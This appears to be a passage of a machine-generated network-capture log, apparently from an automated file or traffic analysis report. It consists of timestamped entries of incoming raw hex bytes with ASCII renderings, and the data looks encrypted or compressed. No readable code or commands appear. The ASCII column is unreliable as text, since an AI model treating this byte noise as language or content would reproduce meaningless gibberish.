                                                                                                                                                2022-09-29 12:51:35 UTC12088INData Raw: 23 a7 13 d3 49 64 be 36 fb d4 d7 6b f2 d4 cc a8 dc c6 54 e9 d1 55 fb b5 32 17 ce 2d 86 90 73 43 cf 86 70 3a 2a 04 82 be 32 4e 5f 25 17 4c 3b 37 1c 3b bc 56 a4 18 f4 bb 25 76 87 55 f2 b0 e2 23 f3 75 7b fd 19 ba 1d cf 50 8f 32 68 e5 0b 43 a1 2f 9f 26 01 d2 8a 8d 6c 06 60 b9 33 0d 1d 47 a4 82 89 ae 28 54 d6 81 b3 25 8d ab f1 86 f4 4d 22 98 2c 7d f4 0f 5d e5 2b a1 95 34 3e 93 a5 5a 20 6c 42 f0 a5 f0 34 af 31 5e fe 40 50 d9 de f3 28 27 ad 84 48 8a ca 51 68 d1 4e e2 0b 12 cf 4c c4 22 01 2a 67 7e 93 40 1f 3a ae 87 aa 3d 3a d2 23 79 cd 3c bc 84 6c e5 df a7 59 11 f0 f0 b3 75 9a f6 8a ec 88 ae fa 7b 07 20 46 d0 68 1b da 8f d0 a7 3d 1b 46 30 7b 5a 16 1a 36 e9 91 70 19 04 bd b9 10 4e 68 67 fc 30 f0 74 fc ae ca 17 63 ec f2 95 36 91 a4 d0 99 33 7b 4e d3 72 49 e7 64 cb
                                                                                                                                                Data Ascii: #Id6kTU2-sCp:*2N_%L;7;V%vU#u{P2hC/&l`3G(T%M",}]+4>Z lB41^@P('HQhNL"*g~@:=:#y<lYu{ Fh=F0{Z6pNhg0tc63{NrId
                                                                                                                                                2022-09-29 12:51:35 UTC12104INData Raw: 22 a4 44 67 6e ff 95 d6 1f a1 9d 49 d2 fc 5f 55 bb 2c d3 a9 e3 f0 54 f5 2a 56 d2 11 1f aa 47 99 d7 a9 11 2c 35 a6 ae 2d 09 c6 ba 8b 2b 86 22 28 9a aa a3 04 85 d4 eb 51 34 6b 4d a4 dc 77 5d b1 88 c7 a9 b7 cc 34 60 8b 4e 42 f0 db dd 70 1c 2c 45 6b f6 de 87 f5 b4 28 e1 b7 da ee 1c 66 66 dd 40 bc 97 6e 02 86 4c 97 22 0e d2 36 c3 cc 44 7c 46 ea 93 4a 4a 2b 67 00 a3 24 d5 23 83 72 d4 2d 60 12 6f 86 b3 e4 a6 9e ff 6f 27 72 f4 47 c4 79 ee 4c 59 0f ed 30 f5 a3 77 5c f8 cc 08 e4 ed 01 35 4a 3c 90 b9 28 69 c0 18 60 ce ec 5f a2 a6 a6 4f f1 0a ea fb 19 ab 10 a6 e9 17 78 49 39 96 61 72 8d c9 e5 b8 48 0b e9 6c 73 24 4d a0 0a 42 2d 6c f1 f9 a3 7d 71 c8 b4 98 6c 9d 42 7e e5 b1 3b 4b 5a 4e 8b 16 cc c0 bd d5 09 bd 07 40 b6 aa 93 f8 f7 1b 8d 86 79 e3 94 2d cf 78 ad 1a a7 18
                                                                                                                                                Data Ascii: "DgnI_U,T*VG,5-+"(Q4kMw]4`NBp,Ek(ff@nL"6D|FJJ+g$#r-`oo'rGyLY0w\5J<(i`_OxI9arHls$MB-l}qlB~;KZN@y-x
                                                                                                                                                2022-09-29 12:51:35 UTC12120INData Raw: 98 cd c4 cc 37 15 d6 d1 8d df 28 2a 7d f5 da 27 7e 61 a4 16 cd fd a8 85 65 6a 0b 6a 3b ac 14 67 9e 42 8e c6 68 a0 da b8 d4 a4 b9 a2 1d 18 03 3e 4e 82 9a 2f 9e 3d b1 90 9f f5 fd c8 9e 8f cf fe 09 5a fc ae 59 ff 94 b5 a3 62 b4 39 42 eb b3 59 0a 7b 6e 8f 56 e8 9b a5 c7 ca 50 95 5a d5 55 32 65 5b 9d 10 22 6d 58 2e bb f4 42 a5 d0 c1 c9 52 4f a5 83 da f8 ff e5 58 85 19 ad df bd 44 ab 85 ac 9f e2 92 d8 be cb ce d9 34 ba 80 cf d9 1e b9 29 59 c3 fd 9d 83 45 a0 76 bd 52 b6 aa 80 86 71 32 9c 3e 4d 10 37 0a 86 7e 64 89 31 db 92 74 38 3c aa 2a 3e 83 b4 dd 85 ff 67 13 b2 79 a6 17 6d de 63 cc 73 7e a2 8f 3a eb 21 2b 7d 62 ed 88 05 d4 cd 42 11 ce 07 82 5d b1 ae 7c da 51 f4 65 09 b9 70 d3 8f 7a 9c b5 14 70 6d f4 35 6c 67 2b 01 83 a1 bb 21 07 b7 01 56 c2 33 dd 20 33 02 31
                                                                                                                                                Data Ascii: 7(*}'~aejj;gBh>N/=ZYb9BY{nVPZU2e["mX.BROXD4)YEvRq2>M7~d1t8<*>gymcs~:!+}bB]|Qepzpm5lg+!V3 31
                                                                                                                                                2022-09-29 12:51:35 UTC12136INData Raw: b2 19 7b 27 d0 94 8a f3 6d e5 18 ab 0b 33 f9 58 de d7 a2 9d f8 bc 88 54 f8 9c 50 4b 38 23 4b 0f 60 51 f6 3e b7 29 8e df 44 88 04 d4 03 9e 9c 6b 98 b4 8a 2a 8e c1 ae 3a d4 85 1d 28 eb 04 a0 f0 f8 f0 82 78 d5 56 41 36 e2 d3 cd 6f f8 89 ef 02 2e 4b 84 cd d1 30 50 09 7d ca 29 9f ad 51 0c 41 1b c0 4e b8 84 29 73 19 8c af b7 3f a9 66 e9 0f 99 af f6 85 1c 6d ba 92 db b9 e8 1b 55 62 d7 3a 5a 69 85 d1 c3 35 06 e7 2b 01 0a ba a2 22 56 26 28 38 93 2e 31 9d 9e af 32 c3 70 b6 93 70 a7 45 77 7d 6f 5c 3e 9f 8e f5 ca b2 2e 7d 82 ce 5f 70 0b d4 fa ca fc f5 8f 4c 5b 25 90 4a f0 aa 5b 52 f5 b8 ae 5b f6 70 ed ba fc 85 30 9d 88 b5 77 b2 3a c3 f2 3c d3 09 04 6d b7 69 77 d3 3c 87 1e f5 59 f2 85 17 e6 c1 b5 8a d2 45 2d f6 37 21 75 f8 a7 df ee d5 fe 15 75 1c 35 c9 7c 97 9f 34 30
                                                                                                                                                Data Ascii: {'m3XTPK8#K`Q>)Dk*:(xVA6o.K0P})QAN)s?fmUb:Zi5+"V&(8.12ppEw}o\>.}_pL[%J[R[p0w:<miw<YE-7!uu5|40
                                                                                                                                                2022-09-29 12:51:35 UTC12152INData Raw: b1 6d 59 8f 55 e6 3d 95 39 fa 9f d2 87 2b c1 2d 73 39 a1 92 65 ee 1d c8 b4 5c 30 04 db 4a d4 59 df 32 f8 e3 e5 f9 7b dc 80 38 9e a7 34 c8 92 66 f8 d7 ef 95 af 90 f1 3f 91 bf cb 91 49 4c bc f5 d9 2a a9 ed 1b a0 87 18 ff 80 0c c4 bc b9 5c 79 39 80 ad 8b fe 34 6f f7 a5 1d f6 a0 97 b3 cc 44 10 16 33 ba 6d aa 69 e4 06 e3 22 a3 9c f6 0f d8 5d 2b f0 0d 90 61 22 51 42 a7 70 08 c4 fe 47 08 2b 5a 06 4d 4b 6c 05 1a 12 7a bd 0c f8 bd 51 ff da ec be 5b 5e 8b 2f 3f c9 9f 98 de 2b b9 07 27 c0 5b de ec dd 10 9e 57 46 ad 82 e6 bc ab a2 7c 7b a7 b6 97 06 de 0b f5 63 58 7a a3 40 02 93 a9 f2 45 45 fa 9e 41 a3 ff d3 ab 0b f3 63 67 4a 4c f1 5c 50 50 bb b2 31 73 55 70 6c b5 fc 91 3d 6b 5a 51 90 47 a3 23 6e f5 7d 5b 5e 3a 36 7e 86 02 ad c0 2c 29 54 d0 42 42 ec bb 4d 02 c5 27 ef
                                                                                                                                                Data Ascii: mYU=9+-s9e\0JY2{84f?IL*\y94oD3mi"]+a"QBpG+ZMKlzQ[^/?+'[WF|{cXz@EEAcgJL\PP1sUpl=kZQG#n}[^:6~,)TBBM'
                                                                                                                                                2022-09-29 12:51:35 UTC12168INData Raw: 0b 09 3f 0d 09 3f 59 83 3e 3d 45 3b 10 75 8f e5 4d 6c f7 c9 70 cd 9b 9d f6 12 31 3b 06 a1 31 d1 3e 29 af 4d 55 88 c6 4f f7 39 5f df 48 9a 56 b7 2f 3a b8 e3 4e 0e bd 6f fe 01 54 f5 bb bf 66 00 39 02 38 ed eb f6 f4 e8 cc 96 8e 68 d5 5d a4 f2 77 37 e2 dc ed 94 a6 98 d0 86 e6 34 03 a8 ec 64 fc b3 62 67 22 14 49 3c 9f 80 f6 b2 f1 dd 36 aa ca 57 fd 33 4b a3 a5 39 8a fe a3 28 20 57 fc e7 33 12 48 2c e2 27 09 20 01 43 5b e8 87 c3 20 d3 8a ce d7 82 b3 f0 0a 13 9f 9b 04 75 be d6 9c 86 bc 75 44 c6 8a 7d 82 7a 29 3e 1e 35 b8 44 38 33 eb a7 f3 62 97 59 79 ee b2 f8 c2 99 c8 fc f4 44 93 02 fa 3b 1f 8b b4 64 d3 ef fe 7b c0 f6 a9 13 1b fe 70 d0 4f 87 30 83 25 62 5a bd 0e 95 8c 9f 0b 4b de 4d fe 21 7c fd a3 65 4a 63 e6 22 54 54 09 23 1b 35 4c 10 c0 46 9b 29 8e 55 be af 68
                                                                                                                                                Data Ascii: ??Y>=E;uMlp1;1>)MUO9_HV/:NoTf98h]w74dbg"I<6W3K9( W3H,' C[ uuD}z)>5D83bYyD;d{pO0%bZKM!|eJc"TT#5LF)Uh
                                                                                                                                                2022-09-29 12:51:35 UTC12184INData Raw: 00 b8 ad 39 b1 8b 76 fc be 8e 7a b0 02 03 e2 82 1f 25 6b f0 67 9c 79 9e 90 74 5b f8 40 b0 b2 81 6e 9d 2e 91 f6 18 06 60 1a bd 3c a0 5b 82 b0 f9 8e d8 9c 82 7e 0c 79 cd b1 a1 27 bc 2b 8d c2 4f 3a 03 3d a2 01 c2 83 e7 ea e1 c2 88 ac b5 b6 59 c9 61 a6 66 95 b5 d4 45 fa 8d 49 f9 3d f4 10 dd 93 61 15 d2 2b a4 20 27 52 e5 dc 6c 12 3b 2e f7 09 3f b2 8d 65 e6 24 ce 1e 1c 66 36 fe 2a d7 e8 f8 93 8b 56 e8 51 68 c9 2d b4 6e 79 44 55 46 c5 e6 d4 bb da ce db 53 27 bc f2 b8 7b 1d 7b ff 55 1c 14 6e 47 97 e2 cb 8c 40 ff 8d 3c 3b be 96 c6 f8 25 28 a1 90 39 c2 dc 31 89 19 bd 80 b1 15 c4 e1 9a c4 42 50 2c ee 8d 0b 01 b1 5a 29 aa 1f e7 2c 2d 95 f3 c1 f6 f3 23 f5 77 34 51 96 07 61 be 3c 67 83 e3 f6 7a f6 9b 4d a2 a4 5d 92 e8 ce e1 ba ee 7a 33 a4 d2 32 62 86 04 51 cd ff 71 08
                                                                                                                                                Data Ascii: 9vz%kgyt[@n.`<[~y'+O:=YafEI=a+ 'Rl;.?e$f6*VQh-nyDUFS'{{UnG@<;%(91BP,Z),-#w4Qa<gzM]z32bQq
                                                                                                                                                2022-09-29 12:51:35 UTC12200INData Raw: 50 af 4c 6f c6 60 68 e9 f6 66 15 93 37 60 a6 09 ff 4d 16 a1 2e 8c e9 aa 17 54 0f 0c 1d 00 d7 a7 1d eb 44 09 9e 3d 3e 1a 15 ae 7d cd 92 74 ce 32 10 37 0d be f9 2b e6 e9 d0 22 58 62 e7 d2 44 a4 2e cc aa 96 2e 1d 88 b2 20 c0 68 5f 59 86 75 ce ac f5 19 93 19 f9 f8 00 7d 32 03 b5 7b 10 49 28 4f 55 0f b9 4a c3 00 56 a1 e6 83 3b 53 a6 0f 7e 43 81 14 fa 1f 26 2b 99 86 87 9a 59 b2 21 9c 18 92 ce 10 7e 18 5f 6f 4a ac 46 e4 5e c0 16 79 03 c2 e3 9d 99 09 b1 84 e2 48 9b 4b cd 98 9e 37 69 b5 06 5f 41 62 a6 7b 8e 58 78 59 61 ab 98 2c 2c 71 5a 95 04 8d 03 34 b2 9c 48 6a 6e cd 51 93 63 3a 8a 93 e9 9d 36 6d 68 11 74 b3 40 1c 5e 1f d5 9e d1 c5 9a fa 3e 6a 15 40 77 f9 14 0e 50 98 cd 63 ed fb a5 65 90 d2 9c da e2 24 7c ab e9 ab ea 7c 63 ce f0 06 a9 c8 c9 42 b4 19 38 42 8c 49
                                                                                                                                                Data Ascii: PLo`hf7`M.TD=>}t27+"XbD.. h_Yu}2{I(OUJV;S~C&+Y!~_oJF^yHK7i_Ab{XxYa,,qZ4HjnQc:6mht@^>j@wPce$||cB8BI
                                                                                                                                                2022-09-29 12:51:35 UTC12209INData Raw: e4 af 97 df 95 5e f4 50 e7 1c b5 d4 38 c4 61 30 53 83 47 17 22 07 ff 4d a3 f2 a8 b4 03 05 70 05 f5 cf 4f 8b 45 ee 94 f3 92 29 e6 3f 02 db 3e 52 2c cb ba 25 ec 6e 19 01 df e8 10 b3 0f 02 7a b4 b2 9f 4c d9 8a 31 12 c1 4e c6 fb fc 4a 6a 44 ff 62 5e 28 cd 30 e1 6c 47 55 b9 b5 ba e4 7b df 98 22 18 42 0b 6f 59 56 c6 c7 0a 38 0f 08 73 8a 19 a7 4e 0a d5 47 72 3c 13 ee 85 4c b5 2d 6b 36 e6 05 f1 0b 13 cb 30 9a 7b 04 6a 80 0a 4d e3 5a 33 59 7c 07 a9 c0 aa 77 57 66 61 bd c9 5e 15 57 48 4c 92 ac eb f1 86 59 b6 5e 52 97 94 97 1e ee 50 09 a5 b2 32 0c e7 00 f5 67 4f e5 b7 d0 ce 13 38 61 17 12 44 ef a8 3e 86 ca 38 05 ab 18 cf ec 88 0c 69 cd 6a 41 13 51 af 8d c3 d2 eb 6c 57 76 21 b4 06 ae fc 13 77 17 22 0a bb cf a7 db 87 dc 9b 71 3c 82 45 5f 94 40 a0 a1 03 99 39 8d 9d 2b
                                                                                                                                                Data Ascii: ^P8a0SG"MpOE)?>R,%nzL1NJjDb^(0lGU{"BoYV8sNGr<L-k60{jMZ3Y|wWfa^WHLY^RP2gO8aD>8ijAQlWv!w"q<E_@9+
                                                                                                                                                2022-09-29 12:51:35 UTC12225INData Raw: 84 dc 54 d3 bc 69 f8 c6 4b 29 d1 8a 8f c3 aa 08 29 e2 67 20 8d 1d 58 4e 7b fe 8e ba 62 18 e8 0b b6 d4 a5 e9 54 50 27 bb 4d bb fb fe 40 23 9c 86 50 0f ba 6c 95 70 05 a1 6a 9e c0 93 f3 7e 0b 63 73 6f 53 af 8f c4 62 91 3e 3f b8 74 05 fe f8 db e4 ab 81 3f 0a b7 a5 bd 4d 85 a6 44 2b be cf 8e 9f 69 54 d2 de fa 38 ae 36 a3 18 7a d0 c3 b5 87 bc 39 47 e1 e5 fc 2b 22 5e 05 b8 a5 e7 6e 16 ee 88 73 40 f6 df 4c fe 6a 23 43 36 40 0a 78 24 57 8a 19 0f 83 d3 6e b8 b8 64 60 82 e8 8d b2 b0 3d ef ad 9b 29 ee 75 6c e3 27 35 3d ed 9e 4f 3a e1 f5 32 b4 6f 92 91 c2 47 c8 e1 e6 60 ce 31 99 c5 42 cd 0d 0d 15 ae fb 80 b0 eb 8f 54 82 a9 1f 45 ea 7d cc 74 8d 27 e3 c2 cf 16 5d 50 8f 15 2a 65 76 aa 72 08 8c 26 3c 9b bf e3 cf 7f 61 76 32 4f dd e5 86 b0 dc 6d d3 0a 86 4c d3 74 8d d8 f3
                                                                                                                                                Data Ascii: TiK))g XN{bTP'M@#Plpj~csoSb>?t?MD+iT86z9G+"^ns@Lj#C6@x$Wnd`=)ul'5=O:2oG`1BTE}t']P*evr&<av2OmLt
                                                                                                                                                2022-09-29 12:51:35 UTC12241INData Raw: c0 ba 4c af 3b da ff 7b 50 c9 91 38 69 74 9f 31 6e cd cc f7 a3 4d 02 5d 6a 25 8c a0 9b b9 12 b4 a9 d1 37 b2 b6 2e 28 cf 0c 55 da 5e 7f d0 5f f2 2f ca 24 78 bb 2e 74 fe 69 5c 9a 86 ef 7a 4a cf 6f b4 91 ac f9 7c 60 40 39 62 b7 0f 96 43 06 d2 78 4d 19 36 b8 b8 0a df 26 94 c0 a0 9b 23 92 f5 56 b6 2b bd 39 08 af fe 21 8e aa 21 b4 31 5e 35 85 71 f1 3e e4 f4 e4 75 a8 fa 20 51 3b d0 b7 47 90 c3 bd fd 1c a6 af ed 34 c4 18 b6 ef 57 6e 9f e4 9e 77 b5 29 53 77 12 42 d0 65 cb ce 52 96 e2 68 2d a0 55 b6 73 77 1e e3 94 0a 53 2a f1 68 78 74 4b 4b 14 f3 f4 a4 b9 60 6b 1c 3d 47 9f 5c ec 53 7e 3b c6 2b ca 19 af 9c c0 5d 23 1d 32 15 9f 63 dd 17 dc 28 22 8d 10 bf 0c 47 42 08 c6 03 e4 f1 e8 3a a0 9f 2f 21 22 73 7d 36 f1 dd 35 8f 2c b9 13 de 36 ab 05 57 84 45 08 54 4e d9 00 e7
                                                                                                                                                Data Ascii: L;{P8it1nM]j%7.(U^_/$x.ti\zJo|`@9bCxM6&#V+9!!1^5q>u Q;G4Wnw)SwBeRh-UswS*hxtKK`k=G\S~;+]#2c("GB:/!"s}65,6WETN
                                                                                                                                                2022-09-29 12:51:35 UTC12257INData Raw: 8d 98 26 3c 3f 7d 18 bf 39 79 76 50 85 f1 2e f7 d8 66 0e 0c ff 98 e3 58 ee f2 91 9a 82 1a 41 85 8e d6 3f 69 85 c2 8f 4e 47 19 ec df 0d c6 8f a2 55 03 b1 3b b4 a5 f5 4e f1 d0 bc 14 65 db d5 72 ce 80 72 77 4d a2 29 9c 9c 80 f2 5c 09 83 23 db 0e 12 69 0b 4e c4 36 df 91 3c 76 a5 75 d2 1f a6 56 2c b9 3c 9f 93 be c9 6f 88 9e c5 58 0d fa 0f 36 83 e1 a8 00 11 78 b2 2b 65 20 f9 a7 3c 6a 8b e0 9b 7c 7d 83 d7 f5 cf 0e 2d 84 8c ee 47 52 9f 4a 82 92 ce e5 ba ae 13 3c ae a5 aa db c1 f1 54 68 2c b4 fc 80 3c 47 c3 75 9c b9 09 60 27 d2 98 ca 54 b8 30 83 b5 2a 41 f7 85 55 b6 ee 48 69 22 37 d7 df 6a 16 12 38 03 3c f9 70 83 bb f3 87 d1 d8 ff cc 5f 83 a6 77 2e 24 8b bd 37 8d f0 5f f6 85 c3 d3 7b aa db 77 a6 32 47 6b fb 4c e9 42 ee c5 fd 1e 4a c1 e5 f4 6e 77 93 49 17 12 e9 78
                                                                                                                                                Data Ascii: &<?}9yvP.fXA?iNGU;NerrwM)\#iN6<vuV,<oX6x+e <j|}-GRJ<Th,<Gu`'T0*AUHi"7j8<p_w.$7_{w2GkLBJnwIx
                                                                                                                                                2022-09-29 12:51:35 UTC12273INData Raw: 25 21 ae 8a a5 ba 7e e2 9d 72 d8 a6 c4 36 a6 00 e5 8e 67 33 64 4c 46 97 6c b7 63 87 f7 cf 4e e9 e2 34 d7 be 2a 4f 81 f7 2d 12 20 a1 82 f8 18 18 e9 4c f8 0f 78 49 23 81 21 c7 08 91 9a 74 9d b5 ac 78 91 ca e2 6c 39 d5 53 4e 2e 7e 9e 82 87 d5 7c 58 32 bf b2 48 af 97 3f 88 a9 fc 37 b4 2c 9a cd be 3a 34 bb 06 80 9b 13 c0 28 20 53 5c 5d 5a 17 72 30 32 cd aa f5 6c 28 80 e1 e0 cd 47 ea 37 7b 15 ff 85 0b 1c ca bb 47 04 b8 fe cf de f0 b5 3b 91 89 a5 19 c7 f2 7a 91 b5 33 b7 57 44 fa 45 4a 8b 43 1f ae ee 7f 1c 4c d3 7c a8 13 41 db 4d 6c 54 25 95 fd 2f ff 2c eb b0 15 b4 2f c2 8d e3 8c 9f c7 8a e4 bc c8 ac be 96 54 1d 35 12 ab e8 91 03 c6 21 5a c4 0f e5 5c 7a fa a6 14 cf 14 fa 6e f2 9b c2 2a 3a 6e 89 2c 91 e8 e4 02 c7 03 07 d5 70 04 ec f6 24 3e 8b 73 13 8b fa cd 10 ce
                                                                                                                                                Data Ascii: %!~r6g3dLFlcN4*O- LxI#!txl9SN.~|X2H?7,:4( S\]Zr02l(G7{G;z3WDEJCL|AMlT%/,/T5!Z\zn*:n,p$>s
                                                                                                                                                2022-09-29 12:51:35 UTC12289INData Raw: ff a6 52 b2 d7 f6 30 25 ed 46 e7 1c aa e8 da 56 94 67 fa 50 47 86 32 eb e7 c6 5f f2 72 ed 96 9f 3f 23 e7 c5 28 ad e1 dd 4a 5f 61 01 00 92 70 af b6 64 70 6f 12 fa 0a 3a 29 bf e2 9d 98 a6 9b 3d ac bd 65 60 db 0b 61 b6 3e 00 5c 04 9a 66 b8 1a d8 e5 03 a8 bd 3d 05 53 29 36 1c b4 5a d0 19 7b 0a f0 41 27 f6 73 1f 86 79 02 05 58 81 b6 52 af f3 bb f1 01 4b ad d4 8b 11 7a 89 4e 66 0a c1 0a 23 32 3a 7a a0 7f 21 ee 3e fe 73 cf 63 4d 2b dd bf f2 36 14 49 30 f3 69 3f f3 67 c7 b3 88 7b 54 7d b2 d0 ae b9 49 b2 fb 06 4d 70 0f d2 80 ca 89 5b be 06 68 ea e0 0d 64 6e fa 0c 85 07 13 8e 81 0f 8a be d4 f8 54 6f 56 a9 66 ae ad 16 a9 30 ef 3a e2 41 43 68 1d 54 35 38 b5 a9 7d da e0 8d 2c 9a 4f 27 1c c6 7d 03 79 34 1b 09 f4 d6 e2 a4 42 2b 17 73 70 3a 3c 54 6d 7c 25 cd d8 50 9e 12
                                                                                                                                                Data Ascii: R0%FVgPG2_r?#(J_apdpo:)=e`a>\f=S)6Z{A'syXRKzNf#2:z!>scM+6I0i?g{T}IMp[hdnToVf0:AChT58},O'}y4B+sp:<Tm|%P
                                                                                                                                                2022-09-29 12:51:35 UTC12305INData Raw: 76 3e d8 cf 33 27 00 7c 31 c0 f0 af 4b f9 5e e7 e1 d3 42 e7 57 f3 b2 e9 03 0b 70 a8 60 3e 30 f5 c3 d3 ed c8 23 bc 18 43 87 15 85 c4 b4 2c b5 b4 80 5b 53 33 39 94 07 f1 7b a5 c4 59 82 6b 7e 99 d8 fe 77 f2 08 3d 16 ed 06 23 f3 d0 c2 73 0a 47 0c 29 4e db f5 87 fb b4 31 d3 0e 5a 2b 73 82 45 39 f5 fd c9 59 f9 6c b4 8c 8c c2 29 cb d2 8f cd c3 3d 85 41 42 5b a5 14 09 74 0c d6 17 37 8b 0f 74 c1 86 3c 22 75 8d d3 2a 0c 97 66 52 6c 01 4f 8e 40 43 20 e7 69 03 4e 89 87 57 8f 4e 4e f2 85 20 53 4b a5 3d 06 07 62 05 05 22 56 27 1f 62 aa 79 14 e7 60 61 d1 4c 98 d8 7a 98 28 47 36 88 ef a7 f2 e4 8f 26 56 81 51 5a d6 c3 6f 74 35 cc 7d 2f 74 4e 0f af 9c 55 a8 8f 05 d3 35 b5 8f 67 2d c8 fc 48 4c b5 aa d6 d2 2c ec de a3 a1 e1 f2 4c fe b7 0d 9e cc ca 4a 8f d6 6d 7a 8b 01 a8 12
                                                                                                                                                Data Ascii: v>3'|1K^BWp`>0#C,[S39{Yk~w=#sG)N1Z+sE9Yl)=AB[t7t<"u*fRlO@C iNWNN SK=b"V'by`aLz(G6&VQZot5}/tNU5g-HL,LJmz
                                                                                                                                                2022-09-29 12:51:35 UTC12321INData Raw: 7f bf 2c 0f 4b c3 a4 48 b1 59 b7 6b 85 90 d9 4e 39 62 27 fc 38 b5 a2 6a 6c 47 01 41 5a 01 ec 58 09 5d c7 91 6b 2f b9 d8 d0 d2 a4 10 2d cd f8 c2 e4 84 54 e6 e8 4a 76 a4 f8 3f c0 23 a1 b1 91 fb 79 16 34 2c 81 76 f4 c9 17 55 8a 7a ee be ca a8 fd 22 9c 0e 59 fe 8a d3 6d 2b 86 cf 22 82 60 b9 5b ba 1f 5b 2d 15 70 3f 66 a4 1a c1 69 fe 01 b4 93 14 29 ec ad 47 8b dc 66 60 d9 f7 51 a0 e2 85 05 6f c8 00 34 ba ee 79 e3 f1 14 ab 2d 28 19 6c 00 a0 48 eb 3d 61 c9 f3 45 76 ae 78 12 15 7b 0e a1 ff b8 f7 be 78 2d 1d 6f 36 c2 1c 3a 58 b1 a0 3f 3f 80 48 bb a2 66 a3 48 f2 4c 4d 97 86 91 17 5a cc f4 b5 b0 c6 e4 3a 38 4f 4f 87 22 9f 23 4d 40 75 a1 b9 81 0d 24 e3 5d a9 f4 d7 eb 70 68 e3 37 12 b7 8b 1d da b6 54 ef 6c 82 16 47 e5 cf af 58 8b 52 81 f9 4d a7 c8 5d 71 f0 d2 98 92 6a
                                                                                                                                                Data Ascii: ,KHYkN9b'8jlGAZX]k/-TJv?#y4,vUz"Ym+"`[[-p?fi)Gf`Qo4y-(lH=aEvx{x-o6:X??HfHLMZ:8OO"#M@u$]ph7TlGXRM]qj
                                                                                                                                                2022-09-29 12:51:35 UTC12337INData Raw: 8b 03 e6 e7 13 a8 4c 06 f0 a6 4b 1f 20 b0 05 29 0f 51 bd 7f 41 93 53 0f b9 bc 24 1d 51 a7 8b 94 a2 76 44 c0 57 22 a9 0f 75 46 9e a3 f6 56 10 f1 2f e6 70 09 05 1f 51 a9 6e 5a 5c fb be 87 bb 57 7d 5d 3f 4d 76 2d 68 9e 64 c4 16 eb 66 28 b3 53 ae 74 d7 8e 0c 46 1a 42 c2 d8 fd c3 6f 11 1d bc 4f b9 76 8a c9 a5 ec bc 7c e7 d0 20 39 c1 4f 93 06 5f be 80 86 8c 98 ce 82 fc 6f 22 07 f8 0f 74 bb 19 04 d4 da fa c9 72 98 7c 6d 1e 43 20 db b6 05 b9 a9 d8 1c 5f bd 0c c6 ee 5e 56 1d 03 4a 26 da d8 7d 88 77 22 8b 0d 63 dd 93 69 3e 99 23 1a d7 2a 69 9d fa 11 0a d6 7f a3 f7 0c 05 0f 92 74 eb 7b 3f 6b 79 90 0f b6 05 6d 63 ab 0a fe e4 09 bb 13 5a 0e 83 0e 77 e6 f3 6d b3 30 65 e9 a2 01 f7 fa 38 c6 70 b7 9f 37 fb 3f ce 57 b3 2b e4 f9 ea 2d 3e 6d 53 ed e4 04 6c f2 ec b5 cf e9 82
                                                                                                                                                Data Ascii: LK )QAS$QvDW"uFV/pQnZ\W}]?Mv-hdf(StFBoOv| 9O_o"tr|mC _^VJ&}w"ci>#*it{?kymcZwm0e8p7?W+->mSl
                                                                                                                                                2022-09-29 12:51:35 UTC12353INData Raw: c2 ae 06 55 0e be 07 35 7a e5 5a 0c e2 be 6d c9 31 81 eb 82 76 53 c9 6a 9e 83 90 92 da 51 27 9d a8 8b 9a 4a 87 4e 25 fc 9e 5f 4c 14 60 ff f7 06 bf 6c c8 a3 5f f4 c1 4d 7e 6c 0e 13 f8 68 e8 17 62 b4 42 97 16 bd 63 30 e3 ad 15 ad 60 63 3c 86 2d 87 7d 80 af 76 c0 b4 4e b5 6b bb b8 f3 d5 d0 97 48 fa 39 8e a4 b3 7d de 46 2c 09 ac 7f 85 7c 41 78 9d 30 f9 f8 7b a7 be a9 77 e0 f8 ed f0 47 66 f8 a7 85 bf 29 5b 27 e2 ef 6a 13 4d 9f 71 33 e4 b3 f7 52 2c ff a2 ae bd 11 81 ad 04 b0 38 fa ff 9b 09 81 74 39 fb 00 82 c4 9e 12 93 bd 1e fb a9 04 28 bc 87 f7 ab 86 5f b1 11 0f be 5e 05 71 a8 bb 6d b4 65 7e 1a 67 63 ae 5c 86 95 b1 d0 03 89 36 6c 00 82 6c 20 1c a9 e5 96 1b ad f6 12 f6 e0 ac 75 f2 8d 0c 89 20 03 4f cd 83 7b 73 20 48 42 d8 7f 4a 80 6f 3b cf 94 07 87 3c ee c2 58
                                                                                                                                                Data Ascii: U5zZm1vSjQ'JN%_L`l_M~lhbBc0`c<-}vNkH9}F,|Ax0{wGf)['jMq3R,8t9(_^qme~gc\6ll u O{s HBJo;<X
                                                                                                                                                2022-09-29 12:51:35 UTC12369INData Raw: ff c4 29 79 90 c6 74 7c 97 6e 8c 38 d2 c4 ca a2 93 49 e2 42 62 ee aa 83 98 1c ad 5a 33 fb aa 0c 2b 39 5a 76 c1 34 3e c6 93 37 cd 1d 46 55 0e 16 d5 1f 22 f3 f2 b6 25 12 e2 20 d7 90 5c 2b 1f 15 c4 ce 02 a8 2c df fd 88 09 cb 29 18 5d 17 9b 9f de 50 20 77 b5 3e f9 f4 5b 8a 3c 80 2c 40 cb 92 50 4c eb 36 3a a0 43 49 e4 28 79 0e da 94 fb 54 b5 0e d7 35 5c 24 eb 54 3e 45 bf c0 fa ec ff b9 54 1f f3 4a 05 17 6e 81 c8 5f bf 7f 98 1a 4a bc 12 d1 a1 24 14 79 e8 b4 a1 27 a3 81 c6 2e 0f 51 35 be 7b 12 dc 5d b2 5c 88 ee 3d 0d de 8d d7 d1 b4 72 62 1b be 35 27 f4 a3 f2 42 a6 d8 90 a5 ff 7b 00 b2 d2 f1 30 55 42 6e 1a 33 25 94 b9 bf 51 28 df 8d 09 25 23 2f 86 46 e4 af 38 eb 85 03 36 bd c3 d6 17 84 ea 1f 96 38 30 25 e1 d0 03 40 eb 32 c8 4e 49 86 8c 08 85 91 6c 4f 3f 98 7b a5
                                                                                                                                                Data Ascii: )yt|n8IBbZ3+9Zv4>7FU"% \+,)]P w>[<,@PL6:CI(yT5\$T>ETJn_J$y'.Q5{]\=rb5'B{0UBn3%Q(%#/F8680%@2NIlO?{
